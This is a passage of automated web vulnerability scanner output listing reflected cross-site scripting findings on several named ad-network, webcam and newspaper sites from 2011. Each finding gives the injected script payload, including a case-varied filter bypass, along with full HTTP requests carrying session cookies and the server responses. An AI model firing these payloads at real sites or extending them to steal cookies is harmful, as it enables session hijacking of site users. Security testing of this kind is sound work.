GET /tag.jsp?pid=0CC81D8&w=300c51d0'%3balert(1)//00d506c594f&h=250&rnd= HTTP/1.1 Host: ads.roiserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Fri, 28 Jan 2011 16:44:00 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D8&rand=" + myRand;
The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload ddf63<script>alert(1)</script>8c447564c06 was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ag.asp?cc=ddf63<script>alert(1)</script>8c447564c06&source=js&ord=5596043 HTTP/1.1 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 293 Content-Type: text/html Expires: Sat, 29 Jan 2011 01:55:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c060=uid=10961381; expires=Sun, 30-Jan-2011 01:56:08 GMT; path=/ Set-Cookie: FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c06=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4045&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Tue, 01-Mar-2011 01:56:08 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sat, 29 Jan 2011 01:56:07 GMT Connection: close
4.151. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ar.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3ce'-alert(1)-'6c601d061a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5b3ce'-alert(1)-'6c601d061a=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/?5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&iy=dallas&id=44&iu=1&vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv ...[SNIP]...
4.152. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ar.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26eb"><script>alert(1)</script>f467ed2684e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b26eb"><script>alert(1)</script>f467ed2684e=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/ X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 16:44:27 GMT Connection: close Content-Length: 21363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?b26eb"><script>alert(1)</script>f467ed2684e=1');return false;"> ...[SNIP]...
4.153. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ar.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f889"><script>alert(1)</script>305652e0e15 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650a2"><script>alert(1)</script>068f5418f8 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d88"><script>alert(1)</script>5d1a3a1c243 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload eb6b5<script>alert(1)</script>fdda9ab7c58 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractioneb6b5<script>alert(1)</script>fdda9ab7c58&n=ar_int_p85001580&1296224152232 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:20 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 9c80e<script>alert(1)</script>2ca5504680a was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=404017409c80e<script>alert(1)</script>2ca5504680a HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:22 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&prad=58087481&arc=404017409c80e%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ca5504680a&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26516
The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload 25b4d<script>alert(1)</script>955dc17c970 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=5808748125b4d<script>alert(1)</script>955dc17c970&AR_C=40401349 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:21 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:21 2011&prad=5808748125b4d%3Cscript%3Ealert%281%29%3C%2Fscript%3E955dc17c970&arc=40401349&; expires=Thu 28-Apr-2011 16:37:21 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296232641; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26380
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1a8f'%3balert(1)//59512309c7e was submitted in the REST URL parameter 1. This input was echoed as b1a8f';alert(1)//59512309c7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:07 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d939b'%3balert(1)//dd97d6f8afc was submitted in the REST URL parameter 2. This input was echoed as d939b';alert(1)//dd97d6f8afc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/20090601d939b'%3balert(1)//dd97d6f8afc/nydn_homepage.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:15 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc63e'%3balert(1)//b971dbab287 was submitted in the REST URL parameter 3. This input was echoed as bc63e';alert(1)//b971dbab287 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/20090601/nydn_homepage.cssbc63e'%3balert(1)//b971dbab287 HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:45 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5631c'%3balert(1)//e099aec72c8 was submitted in the REST URL parameter 1. This input was echoed as 5631c';alert(1)//e099aec72c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css5631c'%3balert(1)//e099aec72c8/20101001/nydn_global.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:07 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38e81'%3balert(1)//ee1bc773075 was submitted in the REST URL parameter 2. This input was echoed as 38e81';alert(1)//ee1bc773075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/2010100138e81'%3balert(1)//ee1bc773075/nydn_global.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:14 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8a1'%3balert(1)//7f8a78c8a5 was submitted in the REST URL parameter 3. This input was echoed as 1b8a1';alert(1)//7f8a78c8a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/20101001/nydn_global.css1b8a1'%3balert(1)//7f8a78c8a5 HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:49 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18eee'%3balert(1)//eaae29adffe was submitted in the REST URL parameter 1. This input was echoed as 18eee';alert(1)//eaae29adffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css18eee'%3balert(1)//eaae29adffe/20101001/nydn_section.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:37:46 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce94e'%3balert(1)//a55edf17fd4 was submitted in the REST URL parameter 2. This input was echoed as ce94e';alert(1)//a55edf17fd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/20101001ce94e'%3balert(1)//a55edf17fd4/nydn_section.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:16 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50562'%3balert(1)//8959375d35d was submitted in the REST URL parameter 3. This input was echoed as 50562';alert(1)//8959375d35d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
